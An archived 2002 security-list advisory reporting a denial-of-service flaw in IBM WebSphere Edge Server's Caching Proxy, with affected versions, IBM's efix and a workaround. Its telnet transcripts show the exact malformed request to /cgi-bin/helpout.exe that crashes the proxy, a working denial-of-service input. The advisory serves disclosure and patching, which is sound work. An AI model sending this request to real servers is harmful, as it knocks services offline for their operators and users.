[NT] IBM WebSphere Edge Server Caching Proxy Denial of Service
From: support@securiteam.comDate: 10/23/02
- Previous message: support@securiteam.com: "[UNIX] XSS Vulnerability in MyMarket"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: 23 Oct 2002 23:33:43 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
IBM WebSphere Edge Server Caching Proxy Denial of Service
------------------------------------------------------------------------
SUMMARY
The Caching Proxy component of IBM's WebSphere Edge Server v2.0 is
vulnerable to a denial-of-service attack against one of the default CGI
programs. A malformed HTTP request for /cgi-bin/helpout.exe will cause
ibmproxy.exe to crash and cease functioning.
IBM now bundles Web Traffic Express v4.0 with WebSphere Edge Server v2.0.
IBM Web Traffic Express v3.6 and earlier were separately shipping
products.
DETAILS
Vulnerable systems:
* IBM Web Traffic Express Caching Proxy Server v4.x (bundled with IBM
WebSphere Edge Server v2.0)
* IBM Web Traffic Express Caching Proxy Server v3.6
Vendor status and information:
IBM Software -
<http://www-3.ibm.com/software/webservers/edgeserver/index.html>
http://www-3.ibm.com/software/webservers/edgeserver/index.html
IBM was notified of this issue and has released efix build number 4.0.1.26
for Caching Proxy Server v4.x, which fixes this issue and other security
issues (see Rapid 7 advisory R7-0008 for more information:
<http://www.rapid7.com/advisories/R7-0008.txt>
http://www.rapid7.com/advisories/R7-0008.txt ).
IBM is tracking this issue as APAR# IY35970.
Solution:
IBM customers should install Caching Proxy efix build 4.0.1.26 or higher.
Efix builds can be downloaded from IBM's secure FTP site. For more
information on obtaining efix builds, contact IBM support with the APAR
number listed above.
This fix has also been ported back to the Web Traffic Express v3.6 code
base. Customers running v3.6 should contact IBM support for more
information on how to upgrade to a newer build.
As a temporary workaround, you can move the file /cgi-bin/helpout.exe to a
non-executable directory until the fix has been applied.
Detailed analysis:
The proxy server will crash when /cgi-bin/helpout.exe is the subject of an
HTTP request that does not include an HTTP version specifier at the end of
the request line.
If you include a version specifier (e.g. "HTTP/1.0"), helpout.exe will
successfully serve up a blank page.
[~] $ telnet localhost 80
Trying 127.0.0.1...
Connected to proxy.victim.com.
Escape character is '^]'.
GET /cgi-bin/helpout.exe HTTP/1.0
HTTP/1.1 200 Document follows
Pragma: no-cache
Last-Modified: Fri, 18 Oct 2002 16:54:40 GMT
Content-Type: text/html
Accept-Ranges: bytes
Connection: close
Date: Fri, 18 Oct 2002 16:54:40 GMT
Server: IBM-PROXY-WTE/2.0
Connection closed by foreign host.
If you send a request with no version specifier, or with a version
specifier that does not include a forward slash (e.g. "HTTP" or ""),
ibmproxy.exe will crash, closing all connections:
[~] $ telnet localhost 80
Trying 127.0.0.1...
Connected to proxy.victim.com.
Escape character is '^]'.
GET /cgi-bin/helpout.exe HTTP
Connection closed by foreign host.
An exception dialog will be displayed on the server console, reading:
ibmproxy.exe - Application Error
The instruction at "0x002662ac" referenced memory at "0x00000000".
The memory could not be "read".
The access violation occurs within the WHTTPD.DLL module.
ADDITIONAL INFORMATION
The advisory can be downloaded by going to:
<http://www.rapid7.com/advisories/R7-0007.txt>
http://www.rapid7.com/advisories/R7-0007.txt
The information has been provided by <mailto:advisory@rapid7.com> Rapid 7
Security Advisories.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[UNIX] XSS Vulnerability in MyMarket"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
